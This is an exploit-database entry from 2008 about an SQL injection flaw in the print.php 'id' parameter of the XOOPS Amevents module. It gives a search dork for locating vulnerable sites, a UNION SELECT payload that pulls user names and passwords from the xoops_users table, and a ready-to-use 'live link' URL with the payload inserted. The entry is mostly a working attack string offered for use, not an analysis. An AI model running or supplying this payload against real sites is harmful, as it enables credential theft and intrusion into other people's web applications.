id: 4467
date: 12/15/2008
title: XOOPS Module Amevents (print.php id) SQL Injection Vulnerability
author: n?tRoot
cves: 

================================================================
XOOPS Module Amevents (print.php id) SQL Injection Vulnerability
================================================================


##########################################
#
# XOOPS Module:  Amevents
#
#
##########################################
#
##AUTHOR : netRoot
#
###########################################
#
# DORKS : dork: /modules/amevents/print.php?id=
###########################################
 
target: scriptpage.com/modules/amevents/print.php?id=[sql Code]
 
Sql code: -98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
 
live link: http://xxx.com/modules/amevents/print.php?id=-98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*




#  0day.today [2023-03-25]  #